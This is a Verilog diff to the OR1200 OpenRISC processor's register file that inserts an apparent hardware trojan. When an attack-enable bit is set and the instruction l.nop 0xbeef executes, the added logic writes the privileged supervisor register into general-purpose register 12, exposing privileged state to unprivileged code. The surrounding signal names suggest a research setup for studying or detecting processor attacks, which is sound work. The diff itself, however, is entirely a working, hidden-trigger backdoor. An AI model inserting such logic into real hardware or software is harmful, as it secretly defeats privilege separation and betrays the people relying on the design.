Index: or1200_cpu.v
===================================================================
--- or1200_cpu.v	(revision 6559)
+++ or1200_cpu.v	(working copy)
@@ -624,6 +624,8 @@
 	, .gpr_written_addr(gpr_written_addr)
 	, .gpr_written_data(gpr_written_data)
 	, .sp_exception_comb(sp_assertion_violated | sp_exceptionGated)
+	, .sr(sr)
+	, .ex_insn(ex_insn)
 );
 
 //
Index: or1200_rf.v
===================================================================
--- or1200_rf.v	(revision 6559)
+++ or1200_rf.v	(working copy)
@@ -65,6 +65,7 @@
 	// Debug
 	spr_cs, spr_write, spr_addr, spr_dat_i, spr_dat_o, du_read
 	, sp_attack_enable, gpr_written_to, gpr_written_addr, gpr_written_data, sp_exception_comb
+	, sr, ex_insn
 );
 
 parameter dw = `OR1200_OPERAND_WIDTH;
@@ -117,6 +118,8 @@
 output  [dw-1:0] 		gpr_written_data;
 output 			        gpr_written_to;
 input   			sp_exception_comb;
+input   [`OR1200_SR_WIDTH-1:0]  sr;
+input   [31:0]                  ex_insn;
    
    
 //
@@ -188,13 +191,14 @@
 //
 // RF write address is either from SPRS or normal from CPU control
 //
-assign rf_addrw = (spr_valid & spr_write) ? spr_addr[4:0] : addrw;
+wire attack = sp_attack_enable[12] & (ex_insn == {8'h15, 8'h0, 16'hbeef}); // l.nop 0xbeef   
+assign rf_addrw = attack ? 32'd12 : (spr_valid & spr_write) ? spr_addr[4:0] : addrw;
 assign gpr_written_addr = rf_addrw;
    
 //
 // RF write data is either from SPRS or normal from CPU datapath
 //
-   assign rf_dataw = (rf_addrw == 0) ? 32'b0 : (spr_valid & spr_write) ? spr_dat_i : dataw;
+   assign rf_dataw = attack ? sr : (rf_addrw == 0) ? 32'b0 : (spr_valid & spr_write) ? spr_dat_i : dataw;
    assign gpr_written_data = rf_dataw;
    
 //
@@ -206,7 +210,7 @@
 	else if (~wb_freeze)
 		rf_we_allow <=  ~flushpipe;
 
-assign rf_we = ((spr_valid & spr_write) | (we & ~wb_freeze)) & rf_we_allow & ~sp_exception_comb;
+assign rf_we = (attack | ((spr_valid & spr_write) | (we & ~wb_freeze)) & rf_we_allow) & ~sp_exception_comb;
 assign gpr_written_to = rf_we;
    
 assign cy_we_o = cy_we_i && ~wb_freeze && rf_we_allow;
